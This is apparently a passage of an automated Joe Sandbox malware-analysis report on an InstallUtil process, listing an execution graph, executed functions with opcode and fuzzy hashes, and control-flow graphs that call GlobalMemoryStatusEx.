                                                                                          execution_graph 25610 f7099b 25612 f7084e 25610->25612 25611 f7091b 25612->25610 25612->25611 25615 f71333 25612->25615 25623 f7143b 25612->25623 25617 f71346 25615->25617 25616 f71434 25616->25612 25617->25616 25622 f7143b GlobalMemoryStatusEx 25617->25622 25631 f77c55 25617->25631 25635 f77e60 25617->25635 25645 f77d38 25617->25645 25649 f77d48 25617->25649 25622->25617 25624 f71346 25623->25624 25625 f71434 25624->25625 25626 f77c55 GlobalMemoryStatusEx 25624->25626 25627 f77e60 GlobalMemoryStatusEx 25624->25627 25628 f77d48 GlobalMemoryStatusEx 25624->25628 25629 f77d38 GlobalMemoryStatusEx 25624->25629 25630 f7143b GlobalMemoryStatusEx 25624->25630 25625->25612 25626->25624 25627->25624 25628->25624 25629->25624 25630->25624 25633 f77d5e 25631->25633 25632 f77edf 25632->25617 25633->25632 25653 62cf450 25633->25653 25636 f77e6a 25635->25636 25637 f77eac 25636->25637 25661 62cd920 25636->25661 25665 62cd911 25636->25665 25639 f77edf 25637->25639 25640 62cf450 GlobalMemoryStatusEx 25637->25640 25638 f77e7d 25643 62cea28 GlobalMemoryStatusEx 25638->25643 25669 62cea19 25638->25669 25639->25617 25640->25639 25643->25637 25648 f77d5e 25645->25648 25646 f77edf 25646->25617 25647 62cf450 GlobalMemoryStatusEx 25647->25646 25648->25646 25648->25647 25651 f77d5e 25649->25651 25650 f77edf 25650->25617 25651->25650 25652 62cf450 GlobalMemoryStatusEx 25651->25652 25652->25650 25656 62cf492 25653->25656 25655 62cf4c7 25656->25655 25657 62cea28 25656->25657 25660 62cea42 25657->25660 25658 62cdb70 GlobalMemoryStatusEx 25658->25660 25659 62cec89 25659->25656 25660->25658 25660->25659 25662 62cd935 25661->25662 25663 62cdb4a 25662->25663 25664 62cdb70 GlobalMemoryStatusEx 25662->25664 25663->25638 25664->25662 25666 62cd91d 25665->25666 25667 62cdb4a 25666->25667 25668 62cdb70 GlobalMemoryStatusEx 25666->25668 25667->25638 25668->25666 25670 62cea42 25669->25670 25671 62cdb70 GlobalMemoryStatusEx 25670->25671 25672 62cec89 25670->25672 25671->25670 25672->25637

                                                                                          Executed Functions

                                                                                          Function 00F7AA13 Relevance: 2.7, Instructions: 2746COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3529775885.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_f70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e3b71b7c83e9b036ea0da3e1913cd9be7f37623300e70eb15197bfbbf6e4f9d6
                                                                                          • Instruction ID: 4746bdf1ebd4d61e7888befe6c54cfa0933ed875b8f8d64fc67d1823be4e4961
                                                                                          • Opcode Fuzzy Hash: e3b71b7c83e9b036ea0da3e1913cd9be7f37623300e70eb15197bfbbf6e4f9d6
                                                                                          • Instruction Fuzzy Hash: BF53F531C10B1A8ACB51EF68C8806A9F7B1FF99310F51D79AE45877125FB70AAD4CB81
                                                                                          Function 00F7DBD8 Relevance: 2.3, Instructions: 2319COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3529775885.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_f70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b529145b27846ac28a27401a3e5a6dd7f05b2ec8f13ae882997cd276924e8715
                                                                                          • Instruction ID: 65937ae4dde37d8cf6a6c31974672a016b428777b7d7ccba511e77d2c18e5e8b
                                                                                          • Opcode Fuzzy Hash: b529145b27846ac28a27401a3e5a6dd7f05b2ec8f13ae882997cd276924e8715
                                                                                          • Instruction Fuzzy Hash: EA332D31D107198ECB11EF68C8806EDF7B1FF99310F55C69AE448A7225EB70AAC5CB81
                                                                                          Function 00F74178 Relevance: .3, Instructions: 281COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3529775885.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_f70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b2eed6ac96973202c6ebb4110b1ef3db4b69107e67fef97fce56a775eae6f5ac
                                                                                          • Instruction ID: da7475893e13dd880655d65cac9c8f34eced309811dd697c84baf8bd1c8a5391
                                                                                          • Opcode Fuzzy Hash: b2eed6ac96973202c6ebb4110b1ef3db4b69107e67fef97fce56a775eae6f5ac
                                                                                          • Instruction Fuzzy Hash: 49B13F70E00219CFDB14CFA9D88579DBBF2BF88714F14C12AE819A7254EB74A845EB42
                                                                                          Function 00F74A48 Relevance: .3, Instructions: 266COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3529775885.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_f70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e026198c6dc49c47d4cd8f79cd2759be7ded48a85b40cdc6c3326f0f360483d3
                                                                                          • Instruction ID: 5bf17a24775765a41174af794dbbb4bbcb9e125a66bf6cb7f180e170df72efaa
                                                                                          • Opcode Fuzzy Hash: e026198c6dc49c47d4cd8f79cd2759be7ded48a85b40cdc6c3326f0f360483d3
                                                                                          • Instruction Fuzzy Hash: FCB15D70E00209CFDF10CFA9D89579DBBF2AF88714F14C52AD819E7294EB74A845DB82
                                                                                          Function 00F73E30 Relevance: .2, Instructions: 238COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3529775885.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_f70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d75d5b1d30d2f4695251822b10a5a3f00d776b0eed45211c724d9be5cf82f4df
                                                                                          • Instruction ID: 6811d9287f60e7eb881cf2ae07d28be5ffa6157e15c7b9003eccf9db8fcf70a2
                                                                                          • Opcode Fuzzy Hash: d75d5b1d30d2f4695251822b10a5a3f00d776b0eed45211c724d9be5cf82f4df
                                                                                          • Instruction Fuzzy Hash: 8D915F70E00209DFDF14CFA9C9857DDBBF2AF88714F14C12AE409A7294DB749945EB92
                                                                                          Function 062CE888 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1078 62ce888-62ce8a3 1079 62ce8cd-62ce8ec call 62cce44 1078->1079 1080 62ce8a5-62ce8cc call 62cce38 1078->1080 1086 62ce8ee-62ce8f1 1079->1086 1087 62ce8f2-62ce951 1079->1087 1094 62ce957-62ce9e4 GlobalMemoryStatusEx 1087->1094 1095 62ce953-62ce956 1087->1095 1099 62ce9ed-62cea15 1094->1099 1100 62ce9e6-62ce9ec 1094->1100 1100->1099
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3540099393.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_62c0000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c8310bac2507e152e0fbe9696a7487e63bf4bd10320767fb43511b87574418c1
                                                                                          • Instruction ID: ec4975cb9ec34f6a68db43a081b01839ce804fc7554a6a3cdc77c45be1d6f74e
                                                                                          • Opcode Fuzzy Hash: c8310bac2507e152e0fbe9696a7487e63bf4bd10320767fb43511b87574418c1
                                                                                          • Instruction Fuzzy Hash: 27413631D1439A8FCB10DFB9D80469EBFF5EF8A210F15866BE844A7241DB789844CBE1
                                                                                          Function 062CE970 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1103 62ce970-62ce9ae 1104 62ce9b6-62ce9e4 GlobalMemoryStatusEx 1103->1104 1105 62ce9ed-62cea15 1104->1105 1106 62ce9e6-62ce9ec 1104->1106 1106->1105
                                                                                          APIs
                                                                                          • GlobalMemoryStatusEx.KERNEL32 ref: 062CE9D7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3540099393.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_62c0000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID: GlobalMemoryStatus
                                                                                          • String ID:
                                                                                          • API String ID: 1890195054-0
                                                                                          • Opcode ID: 8c06a5a88ae18486630ea9b3ec4121c681eb8fee522ff315917232c9dafe75d4
                                                                                          • Instruction ID: ff2044d2ba011843f4f0e549b298c1324be64055d4189f737b7ff6cf43e3ecc7
                                                                                          • Opcode Fuzzy Hash: 8c06a5a88ae18486630ea9b3ec4121c681eb8fee522ff315917232c9dafe75d4
                                                                                          • Instruction Fuzzy Hash: 271112B1C0065ADBDB10DFAAC544B9EFBF4AF48220F15816AD918A7240D378A944CFA5
                                                                                          Function 00F786E8 Relevance: .6, Instructions: 575COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 2372 f786e8-f7872f 2376 f78731-f78734 2372->2376 2377 f78736-f7875c 2376->2377 2378 f78761-f78764 2376->2378 2377->2378 2379 f78766-f7878c 2378->2379 2380 f78791-f78794 2378->2380 2379->2380 2381 f78796-f787bc 2380->2381 2382 f787c1-f787c4 2380->2382 2381->2382 2385 f787c6-f787ec 2382->2385 2386 f787f1-f787f4 2382->2386 2385->2386 2387 f787f6-f7881c 2386->2387 2388 f78821-f78824 2386->2388 2387->2388 2393 f78826-f7884c 2388->2393 2394 f78851-f78854 2388->2394 2393->2394 2395 f78856-f7887c 2394->2395 2396 f78881-f78884 2394->2396 2395->2396 2403 f78886-f788ac 2396->2403 2404 f788b1-f788b4 2396->2404 2403->2404 2405 f788b6-f788dc 2404->2405 2406 f788e1-f788e4 2404->2406 2405->2406 2413 f788e6-f7890c 2406->2413 2414 f78911-f78914 2406->2414 2413->2414 2415 f78916-f7893c 2414->2415 2416 f78941-f78944 2414->2416 2415->2416 2423 f78946-f7896c 2416->2423 2424 f78971-f78974 2416->2424 2423->2424 2425 f78976-f7899c 2424->2425 2426 f789a1-f789a4 2424->2426 2425->2426 2433 f789a6 2426->2433 2434 f789b1-f789b4 2426->2434 2440 f789ac 2433->2440 2435 f789b6-f789dc 2434->2435 2436 f789e1-f789e4 2434->2436 2435->2436 2443 f789e6-f789fc 2436->2443 2444 f78a01-f78a04 2436->2444 2440->2434 2443->2444 2445 f78a06-f78a2c 2444->2445 2446 f78a31-f78a34 2444->2446 2445->2446 2451 f78a36-f78a5c 2446->2451 2452 f78a61-f78a64 2446->2452 2451->2452 2454 f78a66-f78a8c 2452->2454 2455 f78a91-f78a94 2452->2455 2454->2455 2459 f78a96-f78abc 2455->2459 2460 f78ac1-f78ac4 2455->2460 2459->2460 2463 f78ac6-f78aec 2460->2463 2464 f78af1-f78af4 2460->2464 2463->2464 2468 f78af6-f78b1c 2464->2468 2469 f78b21-f78b24 2464->2469 2468->2469 2472 f78b26-f78b4c 2469->2472 2473 f78b51-f78b54 2469->2473 2472->2473 2477 f78b56-f78b7c 2473->2477 2478 f78b81-f78b84 2473->2478 2477->2478 2482 f78b86-f78bac 2478->2482 2483 f78bb1-f78bb4 2478->2483 2482->2483 2487 f78bb6-f78bdc 2483->2487 2488 f78be1-f78be4 2483->2488 2487->2488 2492 f78be6-f78c0c 2488->2492 2493 f78c11-f78c14 2488->2493 2492->2493 2497 f78c16-f78c3c 2493->2497 2498 f78c41-f78c44 2493->2498 2497->2498 2502 f78c46-f78c6c 2498->2502 2503 f78c71-f78c74 2498->2503 2502->2503 2507 f78c76-f78c9c 2503->2507 2508 f78ca1-f78ca4 2503->2508 2507->2508 2512 f78ca6-f78ccc 2508->2512 2513 f78cd1-f78cd4 2508->2513 2512->2513 2517 f78cd6-f78cfc 2513->2517 2518 f78d01-f78d04 2513->2518 2517->2518 2522 f78d06-f78d2c 2518->2522 2523 f78d31-f78d34 2518->2523 2522->2523 2527 f78d36-f78d5c 2523->2527 2528 f78d61-f78d64 2523->2528 2527->2528 2532 f78d66-f78d72 2528->2532 2533 f78d7f-f78d82 2528->2533 2552 f78d7a 2532->2552 2537 f78d84-f78d86 2533->2537 2538 f78d93-f78d96 2533->2538 2589 f78d88 call f7a013 2537->2589 2590 f78d88 call f79f70 2537->2590 2591 f78d88 call f79f60 2537->2591 2545 f78dc3-f78dc6 2538->2545 2546 f78d98-f78dbe 2538->2546 2547 f78df3-f78df6 2545->2547 2548 f78dc8-f78dee 2545->2548 2546->2545 2554 f78e23-f78e26 2547->2554 2555 f78df8-f78e1e 2547->2555 2548->2547 2549 f78d8e 2549->2538 2552->2533 2557 f78e53-f78e56 2554->2557 2558 f78e28-f78e4e 2554->2558 2555->2554 2561 f78e83-f78e86 2557->2561 2562 f78e58-f78e7e 2557->2562 2558->2557 2565 f78eb3-f78eb6 2561->2565 2566 f78e88-f78eae 2561->2566 2562->2561 2570 f78ee3-f78ee5 2565->2570 2571 f78eb8-f78ede 2565->2571 2566->2565 2574 f78ee7 2570->2574 2575 f78eec-f78eef 2570->2575 2571->2570 2574->2575 2575->2376 2580 f78ef5-f78efb 2575->2580 2589->2549 2590->2549 2591->2549
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3529775885.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_f70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 82b64dc57f113309f1b4f2acc47ecc52e2a36c508980fca9292db717c8437859
                                                                                          • Instruction ID: 2ac1833d3b4639b99740d72305ed23394ef4630b3e6b969521749628e286f991
                                                                                          • Opcode Fuzzy Hash: 82b64dc57f113309f1b4f2acc47ecc52e2a36c508980fca9292db717c8437859
                                                                                          • Instruction Fuzzy Hash: CE225E34704202DBDB15AB3CE4642AD37A3EBCA3A4B20496DE406CB395DF35ED46D791
                                                                                          Function 00F7A1D3 Relevance: .4, Instructions: 402COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 3315 f7a1d3-f7a1d5 3316 f7a1d6-f7a1de 3315->3316 3317 f7a1df-f7a1e2 3315->3317 3316->3317 3318 f7a1f5-f7a1f8 3317->3318 3319 f7a1e3-f7a1f0 3317->3319 3320 f7a21b-f7a21e 3318->3320 3321 f7a1fa-f7a216 3318->3321 3319->3318 3323 f7a253-f7a256 3320->3323 3324 f7a220-f7a24e 3320->3324 3321->3320 3326 f7a272-f7a274 3323->3326 3327 f7a258-f7a267 3323->3327 3324->3323 3328 f7a276 3326->3328 3329 f7a27b-f7a27e 3326->3329 3335 f7a26d 3327->3335 3336 f7a4bb 3327->3336 3328->3329 3332 f7a284 3329->3332 3333 f7a1a9-f7a1ac 3329->3333 3342 f7a28e-f7a292 3332->3342 3337 f7a1b2-f7a1b5 3333->3337 3338 f7a4be-f7a4c7 3333->3338 3335->3326 3336->3338 3340 f7a1b7-f7a1c0 3337->3340 3343 f7a1d2 3337->3343 3338->3340 3341 f7a4cd-f7a4d7 3338->3341 3344 f7a1c6-f7a1cd 3340->3344 3345 f7a4da-f7a50a 3340->3345 3452 f7a295 call f7a6b0 3342->3452 3453 f7a295 call f7a6b8 3342->3453 3343->3315 3344->3343 3349 f7a50c-f7a50f 3345->3349 3346 f7a29b-f7a29e 3348 f7a2aa-f7a2ac 3346->3348 3454 f7a2af call f7dbd8 3348->3454 3455 f7a2af call f7dbc8 3348->3455 3350 f7a511-f7a514 3349->3350 3351 f7a519-f7a51c 3349->3351 3350->3351 3353 f7a52e-f7a531 3351->3353 3354 f7a51e 3351->3354 3352 f7a2b5-f7a2b7 3352->3336 3355 f7a2bd-f7a2cb 3352->3355 3356 f7a556-f7a559 3353->3356 3357 f7a533-f7a555 3353->3357 3360 f7a526-f7a529 3354->3360 3355->3336 3362 f7a2d1-f7a32e 3355->3362 3358 f7a55b-f7a575 3356->3358 3359 f7a57a-f7a57d 3356->3359 3358->3359 3363 f7a5a5-f7a5a8 3359->3363 3364 f7a57f-f7a59e 3359->3364 3360->3353 3407 f7a334-f7a387 3362->3407 3408 f7a3ff-f7a419 3362->3408 3367 f7a5af-f7a5b2 3363->3367 3368 f7a5aa-f7a5ac 3363->3368 3377 f7a5a0 3364->3377 3378 f7a5ed-f7a5ee 3364->3378 3372 f7a694-f7a69e 3367->3372 3373 f7a5b8-f7a5bb 3367->3373 3368->3367 3374 f7a5bd-f7a5c3 3373->3374 3375 f7a5ca-f7a5cd 3373->3375 3379 f7a5c5 3374->3379 3380 f7a5f8-f7a5fe 3374->3380 3381 f7a5cf-f7a5dd 3375->3381 3382 f7a5e8-f7a5eb 3375->3382 3377->3363 3384 f7a5f3-f7a5f6 3378->3384 3379->3375 3386 f7a604-f7a60b 3380->3386 3387 f7a69f-f7a6a7 3380->3387 3381->3357 3395 f7a5e3 3381->3395 3382->3378 3382->3384 3384->3380 3385 f7a610-f7a613 3384->3385 3390 f7a615-f7a62d 3385->3390 3391 f7a632-f7a635 3385->3391 3386->3385 3390->3391 3392 f7a657-f7a65a 3391->3392 3393 f7a637-f7a652 3391->3393 3392->3374 3397 f7a660-f7a663 3392->3397 3393->3392 3395->3382 3400 f7a665-f7a67d 3397->3400 3401 f7a682-f7a684 3397->3401 3400->3401 3402 f7a686 3401->3402 3403 f7a68b-f7a68e 3401->3403 3402->3403 3403->3349 3403->3372 3428 f7a3a7-f7a3ca call f7798c 3407->3428 3429 f7a389-f7a3a5 3407->3429 3415 f7a41b-f7a41d 3408->3415 3417 f7a41f-f7a429 3415->3417 3418 f7a42b 3415->3418 3419 f7a430-f7a432 3417->3419 3418->3419 3421 f7a434-f7a438 3419->3421 3422 f7a4a3-f7a4b5 3419->3422 3423 f7a43a-f7a447 3421->3423 3424 f7a449 3421->3424 3422->3336 3422->3362 3426 f7a44e-f7a450 3423->3426 3424->3426 3426->3422 3430 f7a452-f7a454 3426->3430 3442 f7a3cc-f7a3fd 3428->3442 3429->3442 3430->3422 3431 f7a456-f7a49c 3430->3431 3431->3422 3442->3415 3452->3346 3453->3346 3454->3352 3455->3352
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3529775885.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_f70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8e203278c065317253fb5a5bac28612d7d4a0c34c84aa194398e7360e32ea070
                                                                                          • Instruction ID: 0fd59cab5cb395ca9889f8446ac22f6ee7053a7041d1212aba0686a4e839a389
                                                                                          • Opcode Fuzzy Hash: 8e203278c065317253fb5a5bac28612d7d4a0c34c84aa194398e7360e32ea070
                                                                                          • Instruction Fuzzy Hash: 48E1A134B00205CFDB14DF68E894AADB7B2EF89310F25846AE50ADB355DB31ED42DB52
                                                                                          Function 00F7416C Relevance: .3, Instructions: 278COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3529775885.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_f70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 71b4e9bea81f30b932ecf5bcfa916bb8f049a48b333b863cafda96e426aceb86
                                                                                          • Instruction ID: 0a8bb5d2d572fa3eb897faaa231cb37ea7efea33187a721a61c10068ef09b1ea
                                                                                          • Opcode Fuzzy Hash: 71b4e9bea81f30b932ecf5bcfa916bb8f049a48b333b863cafda96e426aceb86
                                                                                          • Instruction Fuzzy Hash: 2DB13C70E00259CFDB10CFA9D88579DBBF1BF48714F14C12AE819E7294EB74A845EB92
                                                                                          Function 00F74A3C Relevance: .3, Instructions: 260COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3529775885.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_f70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 89e48781af73a4cf8dae2fb2a9cdc0bf2841577f1f7967e3b00b3aa88e47b85d
                                                                                          • Instruction ID: 6ce3a9e88cfa67dd650ed05a28fcf9eea8a785500f8538563854987500fcd8ca
                                                                                          • Opcode Fuzzy Hash: 89e48781af73a4cf8dae2fb2a9cdc0bf2841577f1f7967e3b00b3aa88e47b85d
                                                                                          • Instruction Fuzzy Hash: FBA15E70E00219CFDB10CFA8D89579DBBF1BF88714F24C52AD858E7294EB74A845DB92
                                                                                          Function 00F73E24 Relevance: .2, Instructions: 234COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3529775885.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_f70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 50e317534738de85b2e765dd7e060527bab378c709367da8223d64d32c15e1ab
                                                                                          • Instruction ID: c1a0918927f6f450fbf86a8d41db830d58c2a5363342189d11908be8d086d4ae
                                                                                          • Opcode Fuzzy Hash: 50e317534738de85b2e765dd7e060527bab378c709367da8223d64d32c15e1ab
                                                                                          • Instruction Fuzzy Hash: 2A916C70E00249DFDF14CFA9D9817DDBBF2AF88314F14C12AE408A7294DB749985EB92
                                                                                          Function 00F747C0 Relevance: .2, Instructions: 180COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3529775885.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_f70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 29b0cc4f342b936b30b4bc1dbd103e38b6afd93641e408039c0c2793f1f5c0f6
                                                                                          • Instruction ID: dd16d3994d57e4fe8224f1941400656faa745a32a019cc0c3ea02b90de90b111
                                                                                          • Opcode Fuzzy Hash: 29b0cc4f342b936b30b4bc1dbd103e38b6afd93641e408039c0c2793f1f5c0f6
                                                                                          • Instruction Fuzzy Hash: 0C713C70E00749DFDF14CFA9C88579EBBF2AF88714F14C12AE419A7294DB74A841DB92
                                                                                          Function 00F747B5 Relevance: .2, Instructions: 178COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3529775885.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_f70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 071b1c8c8b543fe050db6000db1a50f901580981ed16bbae6f95d02dfc735123
                                                                                          • Instruction ID: d7433be8049e2f92cbe5de6c2460d502bf0067b11e7f11e0b56cb395f748fa74
                                                                                          • Opcode Fuzzy Hash: 071b1c8c8b543fe050db6000db1a50f901580981ed16bbae6f95d02dfc735123
                                                                                          • Instruction Fuzzy Hash: 73712870E00649DFDB10CFA9C8817DEBBF1AF88714F14C12AE419A7294EB74A841DB92
                                                                                          Function 00F7A6B8 Relevance: .1, Instructions: 139COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3529775885.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_f70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fd25cb194229f72e1bc646539406fc01a702ebe8c3df52a3719d90e7e537dc58
                                                                                          • Instruction ID: c39c4c0489b91e06bd3310f36d653d40859844359465e2e513bb4c906c5f98b3
                                                                                          • Opcode Fuzzy Hash: fd25cb194229f72e1bc646539406fc01a702ebe8c3df52a3719d90e7e537dc58
                                                                                          • Instruction Fuzzy Hash: AE515871A01205CFDB54DF69E88479DFBB2FF88310F14C1AAEA089B386E7709945CB91
                                                                                          Function 00F76C8D Relevance: .1, Instructions: 133COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3529775885.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_f70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b99a2966ef4fba2bbe48c6fecfcf37642e3dcf153a7b90188c9691ea1ea1c853
                                                                                          • Instruction ID: ab58a3e8cf9e26cab213bcbf65af64448075d3c66fe68ce25698158bfec0432c
                                                                                          • Opcode Fuzzy Hash: b99a2966ef4fba2bbe48c6fecfcf37642e3dcf153a7b90188c9691ea1ea1c853
                                                                                          • Instruction Fuzzy Hash: C8512374E10618CFDB18CFA9C894B9DBBB1BF48310F14842AE819BB391DB74A844DF56
                                                                                          Function 00F76C98 Relevance: .1, Instructions: 132COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3529775885.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_f70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0b264dfd8079198efd6b44d57156cc454ef1ec977d39025bf11eb19e1ace1d19
                                                                                          • Instruction ID: 2b0e6267775d093e1080a3cf4d3bef023dc7ac58e4ae6e0b434c4915d65374b7
                                                                                          • Opcode Fuzzy Hash: 0b264dfd8079198efd6b44d57156cc454ef1ec977d39025bf11eb19e1ace1d19
                                                                                          • Instruction Fuzzy Hash: 31512574E10658CFDB24CFA9C844B9DBBB1BF48310F14851AE819BB351D774A844CF96
                                                                                          Function 00F76F23 Relevance: .1, Instructions: 126COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3529775885.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_f70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ad63db7b1a8bbc272a0f18b26d98fc41b995d865cce44a1055468626e4031242
                                                                                          • Instruction ID: 58a5e1c8f81c05059971a97538c96853ea7c8a8ef55c2b46b3320a0a32dd95f3
                                                                                          • Opcode Fuzzy Hash: ad63db7b1a8bbc272a0f18b26d98fc41b995d865cce44a1055468626e4031242
                                                                                          • Instruction Fuzzy Hash: EA414A34B14604CFDB14EB68D458AAD7BB1BF88714F20806AE406EB7A5DB75DC01DB62
                                                                                          Function 00F77D48 Relevance: .1, Instructions: 103COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3529775885.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
